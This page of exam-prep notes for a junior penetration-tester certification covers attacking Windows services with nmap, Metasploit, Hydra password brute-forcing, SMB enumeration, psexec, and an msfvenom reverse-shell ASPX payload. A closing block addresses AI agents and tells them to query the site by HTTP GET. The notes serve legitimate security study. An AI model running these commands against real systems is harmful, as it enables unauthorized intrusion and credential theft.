# Windows Exploitation ## Port Scanning & Enumeration - Windows * Conduct a common port scan ```bash nmap -sV ``` * Perform a port scan on ports 1 to 10000 and save output to "nmap\_10k". ```bash nmap -T4 -PA -sC -sV -p 1-10000 -oX nmap_10k ``` * Perform a port scan on all ports and save output to "nmap\_all". ```bash nmap -T4 -PA -sC -sV -p- -oX nmap_all ``` * Conduct a UDP port scan. ```bash nmap -sU -sV -p- ``` * **`msfconsole`** commands: * **`workspace -a `** – Create a new workspace. * **`workspace`** – Display the current workspace. * **`db_import `** – Import an Nmap scan report into the database. * **`hosts`** – List discovered hosts in the current workspace. * **`services`** – List services associated with discovered hosts. * **`auxiliary/scanner/smb/smb_version`** – Use Metasploit to scan for SMB version information. ## Targeting Microsoft IIS FTP ```bash nmap -sV -p 21 --script=ftp-anon ``` * Conduct an Nmap scan on port 21 with the "ftp-anon" script to check for anonymous FTP access. {% code overflow="wrap" %} ```bash hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ``` {% endcode %} * Use Hydra to perform a brute-force attack using a list of Unix usernames and passwords against the specified target. {% code overflow="wrap" %} ```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.aspx ``` {% endcode %} * Generate a reverse shell payload in ASP format using msfvenom, with the specified listener IP and port, and save it to a file named "shell.aspx". ## Targeting OpenSSH ```bash hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt ``` * Use Hydra to perform a brute-force attack with the username "vagrant" and a list of Unix passwords against the specified target IP. ```bash auxiliary/scanner/ssh/ssh_login ``` * Use this Metasploit auxiliary module to scan for SSH servers and attempt to log in using provided credentials or default ones. ## Targeting MySQL Database Server ```bash nmap -sV -sC -p 3306,8585 ``` * Conduct an Nmap scan with version detection and default scripts on ports 3306 and 8585 of the specified IP. ```bash auxiliary/scanner/mysql/mysql_login ``` * Use this Metasploit auxiliary module to scan for MySQL servers and attempt to log in using provided credentials or default ones. ```bash mysql -u -p -h ``` * Use the MySQL client to connect to the specified IP using the given username and password. ## Targeting SMB {% code overflow="wrap" %} ```bash hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt smb ``` {% endcode %} * Use Hydra to perform a brute-force attack with the username "administrator" and a list of Unix passwords against the SMB service on the specified IP. ```bash smbclient -L -U ``` * Use smbclient to list shares on the target IP, providing a username. ```bash smbmap -u -p -H ``` * Utilize smbmap to enumerate shares on the target IP, providing a username and password. ```bash enum4linux -u -p -U ``` * Run enum4linux to gather information from the target IP using specified credentials. ```bash auxiliary/scanner/smb/smb_enumusers ``` * Use this Metasploit auxiliary module to enumerate user accounts on an SMB server. ```bash python3 psexec.py Administrator@ ``` * Run the psexec.py script to attempt remote command execution as the Administrator user on the specified IP. * Ensure to look at the services and their versions for further analysis. *** *** *** **`Hacker's Mantra:`**`The hacker didn’t succeed through sophistication. Rather he poked at obvious places, trying to enter through unlocked doors. Persistence, not wizardry, let him through. - Clifford Stoll` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/exploitation/windows-exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.